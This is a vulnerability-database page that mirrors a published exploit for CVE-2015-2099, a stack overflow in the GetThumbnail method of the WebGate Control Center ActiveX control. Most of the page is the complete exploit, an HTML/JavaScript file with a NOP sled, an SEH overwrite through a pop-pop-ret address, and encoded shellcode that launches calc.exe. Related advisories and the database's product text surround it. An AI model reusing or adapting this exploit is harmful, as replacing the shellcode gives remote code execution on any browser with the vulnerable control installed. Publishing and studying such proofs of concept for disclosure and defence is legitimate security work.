Vulners
Lucene search
WebGate Control Center 4.8.7 GetThumbnail Stack Overflow
šļøĀ 27 Mar 2015Ā 00:00:00Reported byĀ Praveen DarshanamTypeĀ 
Ā packetstormšĀ packetstormsecurity.comšĀ 27Ā Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | WebGate Control Center 4.8.7 GetThumbnail Stack Overflow Exploit | 27 Mar 201500:00 | ā | zdt |
 | CVE-2015-2099 | 22 Jul 202118:15 | ā | attackerkb |
 | WebGate Control Center Multiple Control Buffer Overflow Vulnerability | 12 Mar 201500:00 | ā | cnvd |
 | CVE-2015-2099 | 22 Jul 202117:10 | ā | cve |
 | CVE-2015-2099 | 22 Jul 202117:10 | ā | cvelist |
 | CVE-2015-2099 | 22 Jul 202118:15 | ā | nvd |
 | Buffer overflow | 22 Jul 202118:15 | ā | prion |
 | WEBGATE ActiveX Controls Multiple Buffer Overflows | 9 Mar 201500:00 | ā | nessus |
 | (0Day) WebGate Control Center FileConverter.FileConverterCtrl.1 GetRecFileInfo Stack and Heap Buffer Overflow Remote Code Execution Vulnerabilities | 27 Feb 201500:00 | ā | zdi |
| (0Day) WebGate Control Center LoginContoller.LoginControllerCtrl.1 Login Stack Buffer Overflow Remote Code Execution Vulnerability | 27 Feb 201500:00 | ā | zdi |
10
`<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: 27th March, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE/6/7/8
# CVE : 2015-2099
targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"
progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>
</object>
<script>
var buff1 = "";
var arg2=1;
var arg3=1;
var arg4=1;
var nops = "";
var buff2 = "";
for (i=0;i<24; i++)
{
buff1 += "B";
}
// jump over seh to shellcode
nseh = "\xeb\x08PD";
// pop pop ret
var seh = "\xa0\xf2\x07\x10";
for (i=0;i<80; i++)
{
nops += "\x90";
}
//calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
buff2 += "A";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);
</script>
</html>
`
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2015 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.2007